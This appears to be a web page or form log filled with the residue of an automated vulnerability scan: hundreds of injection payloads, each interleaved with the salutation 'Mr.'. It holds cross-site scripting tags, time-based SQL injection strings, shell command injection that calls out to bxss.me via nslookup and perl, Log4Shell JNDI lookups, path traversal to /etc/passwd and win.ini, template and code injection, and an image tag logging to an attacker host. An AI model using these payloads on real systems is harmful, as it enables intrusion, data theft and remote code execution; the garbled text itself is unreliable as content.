;(nslookup hitfspibjbimda7978.bxss.me||perl -e "gethostbyname('hitfspibjbimda7978.bxss.me')")|(nslookup hitfspibjbimda7978.bxss.me||perl -e "gethostbyname('hitfspibjbimda7978.bxss.me')")&(nslookup hitfspibjbimda7978.bxss.me||perl -e "gethostbyname('hitfspibjbimda7978.bxss.me')")

Mr.

Http://bxss.me/t/fit.txt

Mr.

<script>qUu8(9184)</script>

Mr.

&n920061=v984764

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

)

Mr.

/etc/shells

Mr.

!(()&&!|*|*|

Mr.

<ScR<ScRiPt>IpT>qUu8(9052)</sCr<ScRiPt>IpT>

Mr.

^(#$!@#$)(()))******

Mr.

c:/windows/win.ini

Mr.

bxss.me

Mr.

<ScRiPt
>qUu8(9889)</ScRiPt>

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9945></ScRiPt>

Mr.

'"()

Mr.

<isindex type=image src=1 onerror=qUu8(9629)>

Mr.

'.gethostbyname(lc('hitxe'.'eblcoqcxeedbf.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(110).chr(83).chr(109).chr(67).'

Mr.

'&&sleep(27*1000)*psiyne&&'

Mr.

"&&sleep(27*1000)*ozrrld&&"

Mr.

".gethostbyname(lc("hitic"."tdgolfhv65e9c.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(87).chr(108).chr(78)."

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9126'>

Mr.

'||sleep(27*1000)*xlwjbb||'

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

"||sleep(27*1000)*xhvdee||"

Mr.

';print(md5(31337));$a='

Mr.

";print(md5(31337));$a="

Mr.

<body onload=qUu8(9632)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

${@print(md5(31337))}

Mr.

${@print(md5(31337))}\

Mr.

'.print(md5(31337)).'

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=qUu8(9493)>

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

<img src=xyz OnErRor=qUu8(9669)>

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hituwenmckdddc0251.'+'bxss.me')

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hituwenmckdddc0251."+"bxss.me")+'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hituwenmckdddc0251.'+'bxss.me')+"

Mr.

<img/src=">" onerror=alert(9861)>

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%71%55%75%38%289947%29%3C%2F%73%43%72%69%70%54%3E

Mr.

\u003CScRiPt\qUu8(9717)\u003C/sCripT\u003E

Mr.

-1 OR 2+662-662-1=0+0+0+1 --

Mr.

&lt;ScRiPt&gt;qUu8(9312)&lt;/sCripT&gt;

Mr.

-1 OR 3+662-662-1=0+0+0+1 --

Mr.

-1 OR 2+948-948-1=0+0+0+1

Mr.

-1 OR 3+948-948-1=0+0+0+1

Mr.

"+"A".concat(70-3).concat(22*4).concat(97).concat(74).concat(117).concat(67)+(require"socket"
Socket.gethostbyname("hitcw"+"knlrsoua132f7.bxss.me.")[3].to_s)+"

Mr.

-1' OR 2+754-754-1=0+0+0+1 --

Mr.

%F6<img zzz onmouseover=qUu8(97781) //%F6>

Mr.

'+'A'.concat(70-3).concat(22*4).concat(108).concat(67).concat(103).concat(80)+(require'socket'
Socket.gethostbyname('hitxn'+'gzjqwwmce41d4.bxss.me.')[3].to_s)+'

Mr.

-1' OR 3+754-754-1=0+0+0+1 --

Mr.

http://hituatwbawwkh.bxss.me/

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

Mr.

-1' OR 2+93-93-1=0+0+0+1 or 'DHX98uI0'='

Mr.

<input autofocus onfocus=qUu8(9448)>

Mr.

-1' OR 3+93-93-1=0+0+0+1 or 'DHX98uI0'='

Mr.

/xfs.bxss.me

Mr.

-1" OR 2+815-815-1=0+0+0+1 --

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

Mr.

-1" OR 3+815-815-1=0+0+0+1 --

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

'"

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

'"()&%<zzz><ScRiPt >o4pa(9143)</ScRiPt>

Mr.

<!--

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

}body{zzz:Expre/**/SSion(qUu8(9111))}

Mr.

'"()&%<zzz><ScRiPt >o4pa(9247)</ScRiPt>

Mr.

Y3svD
<ScRiPt >qUu8(9522)</ScRiPt>

Mr.

9850876

Mr.

<WVAWCI>UU5LD[!+!]</WVAWCI>

Mr.

bfg8491<s1﹥s2ʺs3ʹhjl8491

Mr.

<ifRAme sRc=9034.com></IfRamE>

Mr.

bfgx4242%C0%BEz1%C0%BCz2a%90bcxhjl4242

Mr.

<aMcdkdt x=9668>

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<img sRc='http://attacker-9063/log.php?

Mr.

<th:t="${dfb}#foreach

Mr.

<aeVxfND<

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

dfb[[${98991*97996}]]xca

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

<ScRiPt >o4pa(9214)</ScRiPt>

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

<WRND8H>NPIQW[!+!]</WRND8H>

Mr.

<script>o4pa(9288)</script>

Mr.

<ScR<ScRiPt>IpT>o4pa(9837)</sCr<ScRiPt>IpT>

Mr.

<ScRiPt
>o4pa(9764)</ScRiPt>

Mr.

<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9065></ScRiPt>

Mr.

<isindex type=image src=1 onerror=o4pa(9475)>

Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9628'>

Mr.

<body onload=o4pa(9865)>

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

<img src=//xss.bxss.me/t/dot.gif onload=o4pa(9301)>

Mr.

-1; waitfor delay '0:0:15' --

Mr.

<img src=xyz OnErRor=o4pa(9715)>

Mr.

<img/src=">" onerror=alert(9056)>

Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%6F%34%70%61%289373%29%3C%2F%73%43%72%69%70%54%3E

Mr.

\u003CScRiPt\o4pa(9107)\u003C/sCripT\u003E

Mr.

&lt;ScRiPt&gt;o4pa(9423)&lt;/sCripT&gt;

Mr.

%F6<img zzz onmouseover=o4pa(97021) //%F6>

Mr.

<input autofocus onfocus=o4pa(9557)>

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

-1); waitfor delay '0:0:15' --

Mr.

}body{zzz:Expre/**/SSion(o4pa(9232))}

Mr.

a2w51
<ScRiPt >o4pa(9144)</ScRiPt>

Mr.

<WLOEAI>S1K3G[!+!]</WLOEAI>

Mr.

<ifRAme sRc=9620.com></IfRamE>

Mr.

<aNuqH6j x=9084>

Mr.

<img sRc='http://attacker-9987/log.php?

Mr.

<atedKLD<

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

-1; waitfor delay '0:0:15' --

Mr.

1 waitfor delay '0:0:15' --

Mr.

-1); waitfor delay '0:0:15' --

Mr.

GsklwgzE'; waitfor delay '0:0:15' --

Mr.

-1)); waitfor delay '0:0:15' --

Mr.

xIibfLkw'); waitfor delay '0:0:15' --

Mr.

&#xD;&#xA;

Mr.

1 waitfor delay '0:0:15' --

Mr.

3MuweMew')); waitfor delay '0:0:15' --

Mr.

kuACs7d5'; waitfor delay '0:0:15' --

Mr.

-5 OR 246=(SELECT 246 FROM PG_SLEEP(15))--

Mr.

g2L4H8x8'); waitfor delay '0:0:15' --

Mr.

-5) OR 474=(SELECT 474 FROM PG_SLEEP(15))--

Mr.

ljJcO8z4')); waitfor delay '0:0:15' --

Mr.

response.write(9198481*9502404)

Mr.

${j${::-n}di:dns${::-:}${::-/}/hithbsuudaybe1481e${::-.}bxss.me}zzzz

Mr.

&#xD;&#xA;'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-210494&h=58-db8e7-2&"></script>

Mr.

'+response.write(9198481*9502404)+'

Mr.

-1)) OR 930=(SELECT 930 FROM PG_SLEEP(15))--

Mr.

%BF💡'"><&;|${${lower:j}${::-n}d${upper:ı}:dns${::-:}//hitgonxfildfr761be${::-.}bxss.me}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Mr.

/../../../../../../../../../../windows/system32/BITSADMIN.exe

Mr.'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/bsp?u=074625&r=58-210498&h=58-db8e7-2&"></script>

&#xD;&#xA;

Mr.

"+response.write(9198481*9502404)+"

Mr.

echo ttmraz$()\ xfkdfw\nz^xyu||a #' &echo ttmraz$()\ xfkdfw\nz^xyu||a #|" &echo ttmraz$()\ xfkdfw\nz^xyu||a #

Mr.

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-210502.58.db8e7${::-.}1${::-.}bxss.me}}

/../../../../../../../../../../windows/system32/BITSADMIN.exe

&#xD;&#xA;

Mr.

&echo idurul$()\ olxxsc\nz^xyu||a #' &echo idurul$()\ olxxsc\nz^xyu||a #|" &echo idurul$()\ olxxsc\nz^xyu||a #

Mr.

&#xD;&#xA;

response.write(9939069*9594406)

&#xD;&#xA;

${j${::-n}di:dns${::-:}${::-/}/hitlfhurkqagl78a16${::-.}bxss.me}zzzz

&#xD;&#xA;

Mr.

|echo iqevfd$()\ rjrwbq\nz^xyu||a #' |echo iqevfd$()\ rjrwbq\nz^xyu||a #|" |echo iqevfd$()\ rjrwbq\nz^xyu||a #

Mr.

67h61HKM

'+response.write(9939069*9594406)+'

&#xD;&#xA;

KEFskyHx

&#xD;&#xA;

"+response.write(9939069*9594406)+"

&#xD;&#xA;

Mr.

(nslookup hitjkuffhrcxy0be40.bxss.me||perl -e "gethostbyname('hitjkuffhrcxy0be40.bxss.me')")

Mr.

$(nslookup hittfkvhapbrgeb74f.bxss.me||perl -e "gethostbyname('hittfkvhapbrgeb74f.bxss.me')")

${${:::::::::::::::::-j}ndi:dns${:::::::::::::::::-:}${::-/}/dns.log4j.074625.58-210509.58.db8e7${::-.}1${::-.}bxss.me}}

&#xD;&#xA;

Mr.

../../../../../../../../../../../../../../etc/passwd

Mr.

&(nslookup hitcnnqlaapmw06bfe.bxss.me||perl -e "gethostbyname('hitcnnqlaapmw06bfe.bxss.me')")&'\"`0&(nslookup hitcnnqlaapmw06bfe.bxss.me||perl -e "gethostbyname('hitcnnqlaapmw06bfe.bxss.me')")&`'

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

|(nslookup hitvmpatpzpanf4702.bxss.me||perl -e "gethostbyname('hitvmpatpzpanf4702.bxss.me')")

Mr.

file:///etc/passwd

Mr.

`(nslookup hitxadrmwfqak2e0ad.bxss.me||perl -e "gethostbyname('hitxadrmwfqak2e0ad.bxss.me')")`

Mr.

to@example.com>
bcc:074625.58-210512.58.db8e7.19244.2@bxss.me

Mr.

&#xD;&#xA;

Mr. bcc:074625.58-210513.58.db8e7.19244.2@bxss.me

&#xD;&#xA;

Mr.

../
&#xD;&#xA;

Mr.

;(nslookup hitwhjvinudhg4882e.bxss.me||perl -e "gethostbyname('hitwhjvinudhg4882e.bxss.me')")|(nslookup hitwhjvinudhg4882e.bxss.me||perl -e "gethostbyname('hitwhjvinudhg4882e.bxss.me')")&(nslookup hitwhjvinudhg4882e.bxss.me||perl -e "gethostbyname('hitwhjvinudhg4882e.bxss.me')")

to@example.com> bcc:074625.58-210514.58.db8e7.19244.2@bxss.me

&#xD;&#xA;

../../../../../../../../../../../../../../etc/passwd

&#xD;&#xA;

echo hgpzho$()\ odkxmw\nz^xyu||a #' &echo hgpzho$()\ odkxmw\nz^xyu||a #|" &echo hgpzho$()\ odkxmw\nz^xyu||a #

&#xD;&#xA;

../../../../../../../../../../../../../../windows/win.ini

&#xD;&#xA;

&echo mesuvy$()\ vzgjwl\nz^xyu||a #' &echo mesuvy$()\ vzgjwl\nz^xyu||a #|" &echo mesuvy$()\ vzgjwl\nz^xyu||a #

&#xD;&#xA;

file:///etc/passwd

&#xD;&#xA;

Mr.

&#xD;&#xA;

|echo zryutd$()\ eufzuz\nz^xyu||a #' |echo zryutd$()\ eufzuz\nz^xyu||a #|" |echo zryutd$()\ eufzuz\nz^xyu||a #

&#xD;&#xA;

Mr.

&#xD;&#xA;

(nslookup hityfgrrttscm6acdd.bxss.me||perl -e "gethostbyname('hityfgrrttscm6acdd.bxss.me')")

&#xD;&#xA;

../Mr.

&#xD;&#xA;

$(nslookup hitjvlghubtuvc7901.bxss.me||perl -e "gethostbyname('hitjvlghubtuvc7901.bxss.me')")

&#xD;&#xA;

Mr.

&#xD;&#xA;<esi:include src="http://bxss.me/rpb.png"/>

Mr.<esi:include src="http://bxss.me/rpb.png"/>

&#xD;&#xA;

&(nslookup hithbwfmpcydoc60a5.bxss.me||perl -e "gethostbyname('hithbwfmpcydoc60a5.bxss.me')")&'\"`0&(nslookup hithbwfmpcydoc60a5.bxss.me||perl -e "gethostbyname('hithbwfmpcydoc60a5.bxss.me')")&`'

&#xD;&#xA;

Mr.

${9999789+9999717}

${9999554+9999095}

&#xD;&#xA;

Mr.

&#xD;&#xA;

|(nslookup hitwjdrjekfdb6324b.bxss.me||perl -e "gethostbyname('hitwjdrjekfdb6324b.bxss.me')")

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Mr.

&#xD;&#xA;&n986349=v956368

`(nslookup hityutexmskljd21ff.bxss.me||perl -e "gethostbyname('hityutexmskljd21ff.bxss.me')")`

&#xD;&#xA;

Mr.

)

Mr.

Http://bxss.me/t/fit.txt

Mr.

!(()&&!|*|*|

Mr.

http://bxss.me/t/fit.txt?.jpg

Mr.

^(#$!@#$)(()))******

Mr.

/etc/shells

)

&#xD;&#xA;

Mr.

c:/windows/win.ini

!(()&&!|*|*|

&#xD;&#xA;

Mr.

'"()

Mr.&n954746=v914812

&#xD;&#xA;

Mr.

bxss.me

^(#$!@#$)(()))******

&#xD;&#xA;

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Http://bxss.me/t/fit.txt

&#xD;&#xA;

Mr.

-5 OR 831=(SELECT 831 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;

http://bxss.me/t/fit.txt?.

&#xD;&#xA;

/etc/shells

&#xD;&#xA;

Mr.

&#xD;&#xA;'&&sleep(27*1000)*gqzrcy&&'

c:/windows/win.ini

&#xD;&#xA;

Mr.

&#xD;&#xA;"&&sleep(27*1000)*hhekyz&&"

bxss.me

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;'||sleep(27*1000)*gqplet||'

Mr.

&#xD;&#xA;"||sleep(27*1000)*phflss||"

Mr.

'.gethostbyname(lc('hitdk'.'mwyewknb4845d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(74).chr(106).chr(71).'

Mr.

kB8OTOWB' OR 388=(SELECT 388 FROM PG_SLEEP(15))--

Mr.

".gethostbyname(lc("hitpa"."pzyfhbbg5b061.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(68).chr(111).chr(77)."

'.gethostbyname(lc('hitap'.'fcrpudgwc3b51.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(83).chr(102).chr(84).'

&#xD;&#xA;

Mr.

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

'"()

&#xD;&#xA;

Mr.

';print(md5(31337));$a='

".gethostbyname(lc("hitjc"."zfnbwkzi1d164.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(74).chr(97).chr(68)."

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

";print(md5(31337));$a="

Mr.

ctime
sleep
p0
(I30
tp1
Rp2
.

Mr.

${@print(md5(31337))}

Mr.

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitxjqblszgvzf4fa3.'+'bxss.me')

Mr.

${@print(md5(31337))}\

Mr.

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitxjqblszgvzf4fa3."+"bxss.me")+'

Mr.

'.print(md5(31337)).'

Mr.

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitxjqblszgvzf4fa3.'+'bxss.me')+"

Mr.'&&sleep(27*1000)*ttlleu&&'

&#xD;&#xA;

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

&#xD;&#xA;

str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaupnjaffwn34cb7.'+'bxss.me')

&#xD;&#xA;

Mr."&&sleep(27*1000)*fuoksi&&"

&#xD;&#xA;

';print(md5(31337));$a='

&#xD;&#xA;

'+str(__import__("time").sleep(9))+__import__("socket").gethostbyname("hitaupnjaffwn34cb7."+"bxss.me")+'

&#xD;&#xA;

Mr.'||sleep(27*1000)*mtqgzx||'

&#xD;&#xA;

";print(md5(31337));$a="

&#xD;&#xA;

Mr."||sleep(27*1000)*cempkd||"

&#xD;&#xA;

${@print(md5(31337))}

&#xD;&#xA;

"+str(__import__('time').sleep(9))+__import__('socket').gethostbyname('hitaupnjaffwn34cb7.'+'bxss.me')+"

&#xD;&#xA;

${@print(md5(31337))}\

&#xD;&#xA;

'.print(md5(31337)).'

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

HttP://bxss.me/t/xss.html?%00

Mr.

bxss.me/t/xss.html?%00

HttP://bxss.me/t/xss.html?%00

&#xD;&#xA;

bxss.me/t/xss.html?%00

&#xD;&#xA;

Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(65).concat(108).concat(69)+(require"socket"
Socket.gethostbyname("hitez"+"mimlmpyp71452.bxss.me.")[3].to_s)+"

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

Mr.

'+'A'.concat(70-3).concat(22*4).concat(112).concat(69).concat(108).concat(67)+(require'socket'
Socket.gethostbyname('hitsi'+'jiyatrmjda809.bxss.me.')[3].to_s)+'

Mr.

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

"+"A".concat(70-3).concat(22*4).concat(114).concat(81).concat(98).concat(70)+(require"socket" Socket.gethostbyname("hitwd"+"ebypeovtdb1a9.bxss.me.")[3].to_s)+"

&#xD;&#xA;

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7

&#xD;&#xA;

Mr.

http://hitilrhsfhtnb.bxss.me/

'+'A'.concat(70-3).concat(22*4).concat(105).concat(86).concat(98).concat(87)+(require'socket' Socket.gethostbyname('hitzx'+'gcpgjnqh2b173.bxss.me.')[3].to_s)+'

&#xD;&#xA;

Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

%D8%AC%D9%88%D8%AC%D9%84-%D8%AA%D8%AA%D8%AE%D9%84%D9%89-%D8%B9%D9%86-%D9%85%D8%B4%D8%B1%D9%88%D8%B9%D9%87%D8%A7-%D8%B3%D8%AA%D8%A7%D8%AF%D9%8A%D8%A7/.

&#xD;&#xA;

http://hitxaysqwuzed.bxss.me/

&#xD;&#xA;

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

-1 OR 2+631-631-1=0+0+0+1 --

Mr.

/xfs.bxss.me

Mr.

-1 OR 2+474-474-1=0+0+0+1

/xfs.bxss.me

&#xD;&#xA;

Mr.

'"

Mr.

&#xD;&#xA;'"()&%<zzz><ScRiPt >UpXI(9973)</ScRiPt>

Mr.

-5) OR 191=(SELECT 191 FROM PG_SLEEP(15))--

Mr.

-1' OR 2+335-335-1=0+0+0+1 --

Mr.

<!--

Mr.

-1' OR 2+481-481-1=0+0+0+1 or 'ID3gifTg'='

Mr.

&#xD;&#xA;

'"

&#xD;&#xA;

Mr.

-1" OR 2+299-299-1=0+0+0+1 --

Mr.

&#xD;&#xA;

<!--

&#xD;&#xA;

Mr.

'"()&%<zzz><ScRiPt >UpXI(9639)</ScRiPt>

Mr.

&#xD;&#xA;

Mr.

&#xD;&#xA;

Mr.

WfepiLqS') OR 588=(SELECT 588 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;9703071

Mr.

bfg10565<s1﹥s2ʺs3ʹhjl10565

Mr.

bfgx10040%C0%BEz1%C0%BCz2a%90bcxhjl10040

Mr.

<%={{={@{#{${dfb}}%>

Mr.

<th:t="${dfb}#foreach

Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Mr.

dfb{{98991*97996}}xca

Mr.

-1)) OR 640=(SELECT 640 FROM PG_SLEEP(15))--

Mr.

dfb[[${98991*97996}]]xca

Mr.

if(now()=sysdate(),sleep(15),0)

Mr.

dfb__${98991*97996}__::.x

Mr.

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Mr.

24iWamOn')) OR 966=(SELECT 966 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;<ScRiPt >UpXI(9608)</ScRiPt>

Mr.

&#xD;&#xA;<WWFVTL>DOVU7[!+!]</WWFVTL>

Mr.

&#xD;&#xA;<ScRiPt
>UpXI(9612)</ScRiPt>

Mr.

&#xD;&#xA;<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9419></ScRiPt>

Mr.

sUJBQSGM' OR 287=(SELECT 287 FROM PG_SLEEP(15))--

Mr.

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Mr.

&#xD;&#xA;<isindex type=image src=1 onerror=UpXI(9942)>

Mr.

&#xD;&#xA;<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9672'>

Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.

&#xD;&#xA;<body onload=UpXI(9778)>

Mr.

&#xD;&#xA;<img src=//xss.bxss.me/t/dot.gif onload=UpXI(9287)>

Mr.

&#xD;&#xA;<img src=xyz OnErRor=UpXI(9417)>

Mr.

&#xD;&#xA;<img/src=">" onerror=alert(9609)>

Mr.

%0D%0A%26%23%78%44%3B%26%23%78%41%3B%3C%53%63%52%69%50%74%20%3E%55%70%58%49%289396%29%3C%2F%73%43%72%69%70%54%3E

Mr.

VleVRYj3') OR 882=(SELECT 882 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;&lt;ScRiPt&gt;UpXI(9819)&lt;/sCripT&gt;

Mr.

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Mr.

%F6<img zzz onmouseover=UpXI(91021) //%F6>

Mr.

&#xD;&#xA;<input autofocus onfocus=UpXI(9232)>

Mr.

'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Mr.

1'"

Mr.

<a HrEF=http://xss.bxss.me></a>

Mr.

@@VuO2Y

Mr.

<a HrEF=jaVaScRiPT:>

Mr.

&#xD;&#xA;}body{zzz:Expre/**/SSion(UpXI(9820))}

Mr.

&#xD;&#xA;s1mwd
<ScRiPt >UpXI(9010)</ScRiPt>

Mr.

jOpCDYoQ')) OR 76=(SELECT 76 FROM PG_SLEEP(15))--

Mr.

&#xD;&#xA;<WWYSKH>XUMHH[!+!]</WWYSKH>

Mr.

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Mr.

&#xD;&#xA;<ifRAme sRc=9773.com></IfRamE>

Mr.

&#xD;&#xA;<akQIjHi x=9094>

Mr.

&#xD;&#xA;<img sRc='http://attacker-9909/log.php?

Mr.

&#xD;&#xA;<aB5oE6g<

Mr.'"()&%<zzz><ScRiPt >UpXI(9099)</ScRiPt>

&#xD;&#xA;

'"()&%<zzz><ScRiPt >UpXI(9331)</ScRiPt>

&#xD;&#xA;

Mr.9265959

&#xD;&#xA;

Mr.

*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Mr.